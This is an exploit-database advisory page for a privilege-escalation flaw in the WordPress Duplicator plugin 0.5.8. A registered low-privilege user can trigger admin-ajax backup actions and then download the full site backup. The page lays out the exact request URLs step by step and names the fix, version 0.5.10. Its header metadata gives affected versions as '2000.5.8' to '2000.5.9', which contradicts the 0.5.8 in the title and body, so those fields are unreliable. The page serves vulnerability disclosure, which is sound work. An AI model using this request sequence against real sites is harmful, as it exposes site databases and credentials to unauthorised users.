Duplicator 0.5.8 Privilege Escalation

vendor:

Duplicator

by:

Kacper Szurek

7.5

CVSS

HIGH

Privilege Escalation

264

CWE

Product Name: Duplicator

Affected Version From: 2000.5.8

Affected Version To: 2000.5.9

Patch Exists: YES

Related CWE: N/A

CPE: a:wordpress:duplicator

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2014

Duplicator 0.5.8 Privilege Escalation

Every registered user can create and download backup files. The exploit involves sending a request to the admin-ajax.php page with the action parameter set to duplicator_package_scan, duplicator_package_build, duplicator_package_delete, or duplicator_package_report. This will allow the user to create and download backup files.

Mitigation:

Update to version 0.5.10

Source

Exploit-DB raw data:

# Exploit Title: Duplicator 0.5.8 Privilege Escalation
# Date: 21-11-2014
# Software Link: https://wordpress.org/plugins/duplicator/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps

1. Description
  
Every registered user can create and download backup files.

File: duplicator\duplicator.php
add_action('wp_ajax_duplicator_package_scan',		'duplicator_package_scan');
add_action('wp_ajax_duplicator_package_build',		'duplicator_package_build');
add_action('wp_ajax_duplicator_package_delete',		'duplicator_package_delete');
add_action('wp_ajax_duplicator_package_report',		'duplicator_package_report');

http://security.szurek.pl/duplicator-058-privilege-escalation.html

2. Proof of Concept

Login as regular user (created using wp-login.php?action=register) then start scan:

http://wordpress-url/wp-admin/admin-ajax.php?action=duplicator_package_scan

After that you can build backup:

http://wordpress-url/wp-admin/admin-ajax.php?action=duplicator_package_build

This function will return json with backup name inside File key.

You can download backup using:

http://wordpress-url/wp-snapshots/%file_name_from_json%

3. Solution:
  
Update to version 0.5.10